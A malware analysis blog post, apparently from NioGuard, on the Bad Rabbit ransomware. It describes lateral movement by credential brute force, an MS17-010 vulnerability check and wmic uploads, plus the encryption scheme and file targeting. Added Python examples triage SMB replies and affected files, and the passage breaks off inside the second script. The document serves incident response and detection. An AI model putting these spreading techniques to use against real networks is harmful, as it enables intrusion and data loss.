<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">HTTP WebDAV</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Bruteforcing via NTLMSSP</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Similar to the EternalRomance exploit </span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">WMIC</span></div>
</li>
</ul>
<h3 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt;">
<span style="background-color: transparent; color: #434343; font-family: "arial"; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">HTTP WebDAV</span></h3>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="293" src="https://lh6.googleusercontent.com/bq9pKYnugfP5-B1zEg3ze_jZL9Q3ApeyE6iRLdEPZrPytbCTPc-i641cglqPIwPRytg4on14RCpOnwjCWQai-tLbDl4hB98RRoylRaT3gzozIo4cua66LHgU77-xHFIsQhVacRvI" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="602" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="153" src="https://lh6.googleusercontent.com/xKluUPj7HcZ9MBS5BrZC1IqIZQzkX9CdDYsCrOTwGRdK1Vof15wLazHLi7_--it70ipOnpZyMSlF7S0NSTUL4CWpGcc-U_nlpH3fwjtyOzae8YKnWO5tTmmKNFgFeXvUfwuoVu7k" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="593" /></span></div>
<h3 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt;">
<span style="background-color: transparent; color: #434343; font-family: "arial"; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Bruteforcing via NTLMSSP </span></h3>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">BadRabbit tries to connect to a remote computer via SMB/NetBios NTLMSSP using the hardcoded list of logins and passwords.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="95" src="https://lh6.googleusercontent.com/DF4UZK44ICJvF3Etcp6fTH5QmDtLEYIlDGM5cihukdVzvTKHmYMmrukk_FjjrVsxr06xHWG8TigohNE_sz1bQ_owiBXHR3UAnYVYtrGomJZJRpQVyBBraX9qsVJ43YmXAhDfo88F" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="602" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="471" src="https://lh6.googleusercontent.com/ck73IymHcPYu7B91XPWuzj91c-990KOIgXUmTthZZAfPeES5oZCXbretv9RDnxKP1tSQxbK91MQ8FcKhnPvG53ynHhN69zmxD_BxIjnlLc8b1eJONwnUv2XRQTLwilKALu-pV5tt" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="602" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="477" src="https://lh6.googleusercontent.com/cb9hjf_lYKLuFbffMsHgty_n8VuTJd8gJVz3u1etbBtPamIbRANu4bUR31a8WZTIhi79kZw-lUWihTf9qfpyiHDHGe6mFSR3qwp5xM8erbjxeBTyVsmPd5ZjDNH-OLQax2sF8VHs" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="457" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<h3 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt;">
<span style="background-color: transparent; color: #434343; font-family: "arial"; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">EternalRomance exploit</span></h3>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The Bad Rabbit ransomware is equipped with the EternalRomance exploit. To detect the vulnerability, the Bad Rabbit supposedly uses the Metasploit code for MS17-010 SMB RCE detection. </span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">It connects to the IPC$ tree on hosts in a local network using the default ‘FileID = 0’ during the first run and the following file names:</span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">atscvc</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">browser</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">eventlog</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">lsarpc</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">netlogon</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ntsvcs</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">spoolss</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">samr</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">srvsvc</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">scerpc</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">svcct</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Wkssvc</span></div>
</li>
</ul>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">If the service is not vulnerable, it returns “STATUS_ACCESS_DENIED” or “STATUS_INVALID_HANDLE”. Otherwise, the status will be “STATUS_INSUFF_SERVER_RESOURCES”.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
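<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The Python below is an added example (standard library only), not code from this post or from the sample. It decodes the fixed 32-byte SMB1 header of a reply to the FID 0 probe, applies the status rule above, and counts which clients are collecting "vulnerable" answers, which is the scanning host a SOC would want to find. The packets are constructed for the example, and building or sending the probe transaction itself is not shown.</span></div>

```python
"""Triage of SMB1 replies to an MS17-010 named-pipe probe.

Added example, not code from the post or from the malware.  The post says the
check sends a transaction against FID 0 on an IPC$ named pipe and reads the
NT status of the reply.  This parses the 32-byte SMB1 header, classifies the
status the same way, and reports which clients received "vulnerable" replies.
All packets below are constructed, not captured.
"""
import struct
from collections import Counter
from typing import Dict, Iterable, Tuple

SMB1_MAGIC = b"\xffSMB"
SMB_COM_TRANSACTION = 0x25   # the named-pipe probe rides on SMB_COM_TRANSACTION

STATUS_SUCCESS = 0x00000000
STATUS_INVALID_HANDLE = 0xC0000008
STATUS_ACCESS_DENIED = 0xC0000022
STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205


def parse_smb1_header(pkt: bytes) -> Dict[str, int]:
    """Decode the fixed SMB1 header: protocol id (4), command (1), NT status (4),
    flags (1), flags2 (2), PID high (2), signature (8), reserved (2),
    TID (2), PID low (2), UID (2), MID (2)."""
    if len(pkt) < 32 or pkt[:4] != SMB1_MAGIC:
        raise ValueError("not an SMB1 message")
    status, flags, flags2, pid_high = struct.unpack_from("<IBHH", pkt, 5)
    tid, pid_low, uid, mid = struct.unpack_from("<HHHH", pkt, 24)
    return {"command": pkt[4], "status": status, "flags": flags, "flags2": flags2,
            "tid": tid, "pid": (pid_high << 16) | pid_low, "uid": uid, "mid": mid}


def classify_probe_reply(pkt: bytes) -> str:
    """Apply the decision rule from the post to the reply to the FID 0 probe."""
    hdr = parse_smb1_header(pkt)
    if hdr["command"] != SMB_COM_TRANSACTION:
        return "unexpected"           # not a reply to the transaction that was sent
    if hdr["status"] == STATUS_INSUFF_SERVER_RESOURCES:
        return "vulnerable"           # unpatched MS17-010 code path was reached
    if hdr["status"] in (STATUS_ACCESS_DENIED, STATUS_INVALID_HANDLE):
        return "patched"
    return "inconclusive"


def build_smb1_header(command: int, status: int, tid: int = 0x0800,
                      uid: int = 0x0800, mid: int = 0x0040) -> bytes:
    """Constructed server reply header for the examples (flags and PID are
    typical values, not taken from a capture)."""
    flags, flags2, pid = 0x98, 0xC807, 0xFEFF
    return (SMB1_MAGIC + bytes([command])
            + struct.pack("<IBHH", status, flags, flags2, pid >> 16)
            + bytes(8) + bytes(2)
            + struct.pack("<HHHH", tid, pid & 0xFFFF, uid, mid))


def hosts_receiving_vulnerable_replies(
        flows: Iterable[Tuple[str, str, bytes]]) -> Counter:
    """Count, per client, the server -> client replies classified 'vulnerable'.
    A client collecting these from many servers is scanning for MS17-010."""
    hits: Counter = Counter()
    for _server, client, pkt in flows:
        try:
            if classify_probe_reply(pkt) == "vulnerable":
                hits[client] += 1
        except ValueError:
            continue                  # not SMB1 (e.g. SMB2 0xFE 'SMB'), ignore
    return hits


if __name__ == "__main__":
    # Constructed traffic: one scanner (10.0.0.77), three targets, one unpatched.
    flows = [
        ("10.0.0.5", "10.0.0.77", build_smb1_header(SMB_COM_TRANSACTION, STATUS_INSUFF_SERVER_RESOURCES)),
        ("10.0.0.6", "10.0.0.77", build_smb1_header(SMB_COM_TRANSACTION, STATUS_ACCESS_DENIED)),
        ("10.0.0.7", "10.0.0.77", build_smb1_header(SMB_COM_TRANSACTION, STATUS_INVALID_HANDLE)),
        ("10.0.0.8", "10.0.0.77", b"\xfeSMB" + bytes(60)),
    ]
    for server, _client, pkt in flows[:3]:
        print(server, classify_probe_reply(pkt))
    print(hosts_receiving_vulnerable_replies(flows))
```

<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The status is read from offset 5 of the header as a little-endian DWORD, so the same triage works on raw SMB1 payloads pulled out of a pcap. A single STATUS_INSUFF_SERVER_RESOURCES reply is a finding about the server; many of them converging on one client is the worm.</span></div>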
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="139" src="https://lh4.googleusercontent.com/tY_Qvc4NBLbRi1a_yY3WcQm-MXYQTJ9wFsxnFTNdgw20CzlmYraBZGZEIhyi8gF-7DWJPC6tuL4fK7PWXPK8jsGHjbkZi4AOqkEAzVq-X4qkC3mnFgiPBn4b3oLmeVvNQJFFDsOl" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="602" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="427" src="https://lh5.googleusercontent.com/8kk8A380k66KtMDl5oE0djXpk-Br6D-aB2ef9561Dn_iFCmasBjvjawTnZlFM7zy8oEdRnU_2_8c4ZRzIyXxMHtAv33wKUdJbtCNnUu4jqcApPWHvXPwdVfg6-DUymeXq2dEgNmT" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="602" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="309" src="https://lh6.googleusercontent.com/wX9si0C0bbrneMbaFlzRUYO3wTGVE0gvbJpIv3CJrRzA11nYRh4lzZ3UqPI4s6O2soMbMP2YclHtIwVPpf5ZYvChgwnnNiSrJsYDhA7VYQaGttL0LD1GqzKYIch-cVlzzHwf_NY3" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="602" /></span></div>
<h3 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt;">
<span style="background-color: transparent; color: #434343; font-family: "arial"; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">WMI</span></h3>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">It tries to upload its files to the admin$ share on hosts in a local network using wmic.exe</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="279" src="https://lh6.googleusercontent.com/VM_IPPRaGYUx23LdEyEVIq0ZI2fLvAMPhzsBaiqe9eE8kt5leUMGjy2UWjZ5WbHU25lJM9bW_D-8aREfF-UekN-S8wH9x8ti8OmqDwcavJf2hJ7M-NGVTFOJ5kG_YtLo8uJl_GU5" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="602" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 16pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Encryption</span></h2>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The file encryption is done with AES-128-CBC using the Microsoft Cryptographic Provider. The AES key is encrypted using the hardcoded RSA-2048 public key.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The files with the following extensions are encrypted:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<blockquote class="tr_bq" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">.3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip</span></blockquote>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="background-color: white; line-height: 1.8456; margin-bottom: 11pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The list of folders where BadRabbit does not encrypt files:</span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: #444444; font-family: Arial; font-size: 10.5pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 19pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.8456; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Windows</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: #444444; font-family: Arial; font-size: 10.5pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 19pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.8456; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Program Files</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: #444444; font-family: Arial; font-size: 10.5pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 19pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.8456; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ProgramData</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: #444444; font-family: Arial; font-size: 10.5pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 19pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.8456; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">AppData</span></div>
</li>
</ul>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The Bad Rabbit ransomware encrypts each targeted file and appends the wide-char string “encrypted” to the very end of the file:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="277" src="https://lh5.googleusercontent.com/l1qRygD8TCjn-otRnbRVR4YkC0ksSAHL3hkESVbARaX0IjlTSy2uQeU0N5csPhr_G4Gyre-f3clMi0WltZrRjLrHNGdKSAaDfZwneP0wSeZwcqi63EqLlzuF2Z0bjifG0Xo4H2bj" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="602" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<b style="font-weight: normal;">The file encryption function:</b><br />
<b style="font-weight: normal;"><br /></b> <b style="font-weight: normal;"><span id="docs-internal-guid-c5aa4db3-5e5b-ec7e-a2ae-23618fadc67c"><span style="font-family: "arial"; font-size: 11pt; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;"><img height="261" src="https://lh4.googleusercontent.com/D4ncIeod6JDW8pzcqAeckyQdvQ2BReRD7GQFRFKQZVEm5e_WRdyFEm42jwAfTBDx9qGVKx46KDEI7xKaXj3ngJOQ-txmu85iDu5OUqGTWPuqbkjQ3tCv8IS8wEUZyyTdNoqoqJyg" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="602" /></span></span></b><br />
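The targeting rules described above (the extension list, the four skipped folders and the trailing “encrypted” marker) are enough to build a read-only triage tool for incident responders. The following script is an added example, not code from the original post or from the malware; it assumes that the folder skip matches any path component with that name, that matching is case-insensitive, and that the marker is UTF-16LE without a terminating NUL.

```python
"""
Added example, not part of the original NioGuard post: a read-only triage
script built from the targeting rules described above. It (1) reproduces
Bad Rabbit's file selection, the extension list and the four skipped
folders, to estimate which files on a host or share were in scope, and
(2) flags files that already carry the wide-char "encrypted" marker
appended at the very end of the file. Nothing here modifies a file.
Assumptions not stated in the post: the folder skip matches any path
component with that name, extension and folder matching are
case-insensitive, and the marker is UTF-16LE without a trailing NUL.
"""
import os
import tempfile
from pathlib import Path

# Extension list exactly as the post quotes it (dot-separated string).
_RAW_EXTENSIONS = (
    ".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg"
    ".conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz"
    ".h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg"
    ".odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem"
    ".pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf"
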